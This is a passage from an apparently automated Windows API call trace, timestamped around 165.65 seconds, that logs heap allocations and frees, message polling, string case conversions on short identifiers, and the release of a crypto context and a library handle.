wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.650] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.650] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.651] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.651] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.651] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.651] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.651] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.651] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.651] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.652] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.652] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.652] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.652] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.652] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.652] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.653] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.653] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.653] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0165.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416a80 | out: hHeap=0x25c0000) returned 1 [0165.655] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.655] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.655] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.655] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.656] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.656] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.656] FreeLibrary (hLibModule=0x74d40000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.656] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.656] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.657] CloseHandle (hObject=0x170) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.659] CloseHandle (hObject=0x1e8) returned 1 [0165.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.662] RtlAllocateHeap 